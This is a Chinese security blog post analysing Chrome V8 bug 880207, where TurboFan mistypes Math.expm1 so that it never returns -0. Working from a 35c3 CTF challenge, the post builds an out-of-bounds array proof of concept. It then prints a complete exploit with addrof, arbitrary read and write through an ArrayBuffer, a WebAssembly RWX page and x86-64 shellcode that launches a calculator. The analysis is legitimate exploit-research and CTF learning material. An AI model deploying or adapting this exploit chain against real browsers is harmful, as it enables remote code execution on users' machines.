华域联盟 安全资讯 Chrome-V8-Issue-880207

Chrome-V8-Issue-880207

 

这是A guided tour through Chrome’s javascript compiler上的第三个漏洞,下面是对应的commit。

 

 

环境配置

 

用v8-action(星阑科技开源,使用方法https://mp.weixin.qq.com/s?__biz=Mzg5NjEyMjA5OQ==&mid=2247484916&idx=1&sn=1d07443c7e3817bd4186c616598f4889&chksm=c004a868f773217e8577b404c3032eef5e135311adeab1976c8189c1c0e7fdba3d68ae6d3f16&scene=21#wechat_redirect)

 

env: PATCH_FLAG: true COMMIT: 408d89041e7a21f74b37294ebed59f88d357b9c1 DEPOT_UPLOAD: false SRC_UPLOAD: true BINARY_UPLOAD: false

 

编译

 

cd v8 tools/dev/v8gen.py x64.debug ninja -C out.gn/x64.debug d8 tools/dev/v8gen.py x64.release ninja -C out.gn/x64.release d8 cd ..

 

漏洞分析

 

看下diff

 

diff –git a/src/compiler/operation-typer.cc b/src/compiler/operation-typer.cc index b88b5c6..85c0998 100644 — a/src/compiler/operation-typer.cc +++ b/src/compiler/operation-typer.cc @@ -417,7 +417,7 @@ Type OperationTyper::NumberExpm1(Type type) { DCHECK(type.Is(Type::Number())); – return Type::Union(Type::PlainNumber(), Type::NaN(), zone()); + return Type::Number(); } Type OperationTyper::NumberFloor(Type type) {

 

简单看来就是之前返回值的类型判断失误

 

从这里

 

https://docs.google.com/presentation/d/1DJcWByz11jLoQyNhmOvkZSrkgcVhllIlCHmal1tGzaw/edit#slide=id.g52a72d9904_6_6

 

可以看到

 

 

expm1(x)返回e^x-1,其类型为除了kMinusZero之外的所有类型(优化阶段定义的类型,和它实际能不能返回-0没有关系,这只是turbofan的预测) kMinusZero就是-0。

 

V8 version 7.1.0 (candidate) d8> %DebugPrint(-0) DebugPrint: -0 0x27e6d5e82641: [Map] – type: HEAP_NUMBER_TYPE – instance size: 16 – elements kind: HOLEY_ELEMENTS – unused property fields: 0 – enum length: invalid – stable_map – back pointer: 0x27e6d5e825b1 <undefined> – prototype_validity cell: 0 – instance descriptors (own) #0: 0x27e6d5e82321 <DescriptorArray[2]> – layout descriptor: (nil) – prototype: 0x27e6d5e822a1 <null> – constructor: 0x27e6d5e822a1 <null> – dependent code: 0x27e6d5e82391 <Other heap object (WEAK_FIXED_ARRAY_TYPE)> – construction counter: 0 0 d8> %DebugPrint(0) DebugPrint: Smi: 0x0 (0)

 

可以看到-0和0差别还挺大,显示-0的type是HEAP_NUMBER_TYPE。

 

我们前面看到turbofan对其返回值定义类型里面没有-0这一说,但实际上会返回,测试一下。

 

function foo(){ return Object.is(Math.expm1(-0), -0); } print(foo()); %OptimizeFunctionOnNextCall(foo); print(foo());

 

 

可以看到优化之后和优化之前结果不同,我猜turbofan直接将其优化为false了

 

 

看了一下还真是,我们的目的是要让turbofan以为它是false,实际上它是true,这样的话就能数组越界(true为1,false为0,turbofan认为是0,觉得不会越界,所以会把CheckBound优化掉,这是漏洞的重点,但是运行时实际是1,然后乘法就能获得任意长度越界),这样就要求它在后面的优化阶段不能直接将其优化为false,我们要逃过一些优化阶段。

构造越界poc

 

首先是Object.is(x, -0)的问题,通常这个运算在turbofan里呈现的是一个SameValue结点这里

https://docs.google.com/presentation/d/1DJcWByz11jLoQyNhmOvkZSrkgcVhllIlCHmal1tGzaw/edit#slide=id.g52a72d9904_6_27

 

 

但是对于typed optimization会把它用别的直接判断结点替代,就比如我们这里和-0判断是否相等,那就会直接替换为判断是否和-0相等的结点,单这点看不出什么,似乎不影响我们的利用,但是这里优化还没完,在后面,因为判断Math.expm1(x) 的结果不可能是-0,所以这个结点会被进一步直接优化为false(在Load elimination phase),所以我们必须阻止其由SameValue变为ObjectIsMinusZero。

 

那么我们简单的不让turbofan在优化时能够确保Object.is(x, Math.expm1(y))中的一个参数为-0就行,很简单的一件事,我们可以这么做。

 

function foo(x){ return Object.is(Math.expm1(-0), x); } print(foo(0)); %OptimizeFunctionOnNextCall(foo); print(foo(0)); print(foo(-0));

 

 

因为优化时根据调用产生的vector,没有指定是-0,而且那参数还会变,所以没有去掉SameValue,但这只是一方面,我们需要更详细的。

 

我们需要在simplified lowering前使其保持SameValue,也就是可以在escape analysis里把确切的值得出,那么我们可以通过。

 

let o = {mz: -0}; Object.is(o.mz, Math.expm1(-0));

 

这种形式来使得在escape analysis里面出确切值,在simplified lowering中判断其为false,这样才能访问数组时取消check bound。

 

和slide上写的不太一样,那上面写的是这种程度的变量简化在loadelimiation阶段就能替换上去,等不到escape。

 

 

但是我本地尝试的似乎不需要那么麻烦。

 

 

 

 

发现只用let o = {mz: -0};也能解决问题。

 

slide就说这种方法在实践中没有达到预期目的… :\,我自己试了下也是如此,后面作者写的内容我分辨不出是不是这种思路的延续,当我尝试去写时,提炼出来的无非是,在优化一次后再破坏一次,然后再优化,这似乎就是他说的能避免ChangeFloat64ToTagged从而避免-0被截断为0,并且我也在diff里找到了这份poc。

 

(function TestOptimizedFastExpm1MinusZero() { function foo() { return Object.is(Math.expm1(-0), -0); } assertTrue(foo()); %OptimizeFunctionOnNextCall(foo); assertTrue(foo()); })(); (function TestOptimizedExpm1MinusZeroSlowPath() { function f(x) { return Object.is(Math.expm1(x), -0); } function g() { return f(-0); } f(0); // Compile function optimistically for numbers (with fast inlined // path for Math.expm1). %OptimizeFunctionOnNextCall(f); // Invalidate the optimistic assumption, deopting and marking non-number // input feedback in the call IC. f(“0”); // Optimize again, now with non-lowered call to Math.expm1. assertTrue(g()); %OptimizeFunctionOnNextCall(g); assertTrue(g()); })();

 

能成功返回false但是看turbolizer也是被turbofan直接优化为false,还是要自己写。

 

最后心态崩溃,选择35c3 ctf的一道赛题附件来做,题目下载地址

 

https://abiondo.me/assets/ctf/35c3/krautflare-33ce1021f2353607a9d4cc0af02b0b28.tar

 

那道题基本就是还原了这个issue,不同的是,在自己编译的d8上跑poccheck bound怎么都去不掉,而在这一赛题上。

 

function foo(x) { let o = {mz: -0}; let i = Object.is(Math.expm1(x), o.mz); i *= 10; let a = [0.1, 0.2, 0.3, 0.4, 0.5]; return a[i]; } foo(0); for(let i = 10000;i>0;i–){ foo(“0”); } for(let i=10000;i>0;i–){ foo(0); } print(foo(-0));

 

 

如果你读出来是undefine,不要灰心,换个越界下标,从合法下标开始一个个增一个个试。

 

 

在simplified lowering阶段这个check bounds会被消掉,原因很简单,turbofan在优化时对于确定的显示不会造成越界的值,会把check优化掉。

 

那么我们最终越界poc。

 

var oob_arr; function foo(x) { let o = {mz: -0}; let i = Object.is(Math.expm1(x), o.mz); i *= 14; let a = [0.1, 0.2, 0.3, 0.4, 0.5]; let b = [1.1, 1.2, 1.3, 1.4]; oob_arr = b; a[i] = -1; } foo(0); for(let i = 10000;i>0;i–){ foo(“0”); } for(let i=10000;i>0;i–){ foo(0); } foo(-0); print(oob_arr.length);

 

 

如此我们就得到了一个越界数组,我们需要做的是误导turbofan,让其产生错误的判断,从而消去一些检查,因为turbofan认为不会发生的事并不是真的不会发生,他只是基于优化时的feedback的猜测去更改一些生成的IR,另外数组越界要发生在函数内,因为优化的是函数,对应的能优化掉的检查也是函数内的,我们想要返回一个能够越界的数字给外面数组用来越界是不现实的,我们要么在内部完成越界,要么把内部完成越界的数组或者越界后读的值,或者越界后写入函数外数组的length位置。

 

另外对于越界之后的操作,差别不大,只需好好调试或查找资料,自己可以完成剩余部分的工作,贴上我写的。

 

exp

 

function hex(i) { return i.toString(16).padStart(16, “0”); } const buf = new ArrayBuffer(8); const f64 = new Float64Array(buf); const u32 = new Uint32Array(buf); function f2i(val) { f64[0] = val; let tmp = Array.from(u32); return tmp[1] * 0x100000000 + tmp[0]; } function i2f(val) { let tmp = []; tmp[0] = parseInt(val % 0x100000000); tmp[1] = parseInt((val – tmp[0]) / 0x100000000); u32.set(tmp); return f64[0]; } var oob_arr; function foo(x) { let o = {mz: -0}; let i = Object.is(Math.expm1(x), o.mz); i *= 14; let a = [0.1, 0.2, 0.3, 0.4, 0.5]; let b = [1.1, 1.2, 1.3, 1.4]; oob_arr = b; a[i] = -1; } foo(0); for(let i = 10000;i>0;i–){ foo(“0”); } for(let i=10000;i>0;i–){ foo(0); } foo(-0); print(oob_arr.length); var obj = {mark:i2f(0x11111111),n:i2f(0x41414141)}; var ABuffer = new ArrayBuffer(0x200); var off_buffer = 0; var off_obj = 0; //%DebugPrint(obj); //%DebugPrint(ABuffer); for(var i=0;i<500;i++) { let tmp = oob_arr[i]; if(f2i(tmp) == 0x11111111) { off_obj = i+1; break; } } for(var i=0;i<500;i++) { let tmp = oob_arr[i]; if(f2i(tmp) == 0x0000000000000200) { off_buffer = i+1; break; } } console.log(“[+] off_obj @”+off_obj); console.log(“[+] off_buffer @”+off_buffer); let dataView = new DataView(ABuffer); function addrof(x) { obj.n = x; return f2i(oob_arr[off_obj]); } function arb_read(addr) { oob_arr[off_buffer] = i2f(addr); return f2i(dataView.getFloat64(0,true)); } function arb_write(addr,payload) { oob_arr[off_buffer] = i2f(addr); for(let i=0; i<payload.length; i++) { dataView.setUint8(i, payload[i]); } } let wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]); let wasmModule = new WebAssembly.Module(wasmCode); let wasmInstance = new WebAssembly.Instance(wasmModule); let f = wasmInstance.exports.main; let f_Addr = addrof(f); f_Addr = arb_read(f_Addr-1+8*3); f_Addr = arb_read(f_Addr-1+8*1); f_Addr = arb_read(f_Addr-1+8*2); rwx_addr = arb_read(f_Addr-1+8*0x1d); print(“[*] Get RWX address : “+hex(rwx_addr)); var shellcode = [0x48,0xb8,0x2f,0x78,0x63,0x61,0x6c,0x63,0x0,0x0,0x50,0x48,0xb8, 0x2f,0x75,0x73,0x72,0x2f,0x62,0x69,0x6e,0x50,0x48,0x89,0xe7,0x48, 0x31,0xc0,0x50,0x57,0x48,0x89,0xe6,0x48,0x31,0xd2,0x48,0xc7,0xc0, 0x3a,0x31,0x00,0x00,0x50,0x48,0xb8,0x44,0x49,0x53, 0x50,0x4c,0x41,0x59,0x3d,0x50,0x48,0x89,0xe2,0x48,0x31,0xc0,0x50, 0x52,0x48,0x89,0xe2,0x48,0xc7,0xc0,0x3b,0x00,0x00,0x00,0x0f,0x05]; arb_write(rwx_addr, shellcode); print(“[*] Tigger my shellcode”); f();

 

 

其实真正核心工作只有构造出越界数组部分,剩下的把自己以前写的exp搬来修改调整就出来了。

 

参考

 

https://docs.google.com/presentation/d/1DJcWByz11jLoQyNhmOvkZSrkgcVhllIlCHmal1tGzaw/edit#slide=id.g52a72d9904_6_0

https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/

本文由 华域联盟 原创撰写:华域联盟 » Chrome-V8-Issue-880207

转载请保留出处和原文链接:https://www.cnhackhy.com/129250.htm

本文来自网络,不代表华域联盟立场,转载请注明出处。

作者: sterben

企业如何做好员工安全意识提升

发表回复

联系我们

联系我们

2551209778

在线咨询: QQ交谈

邮箱: [email protected]

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部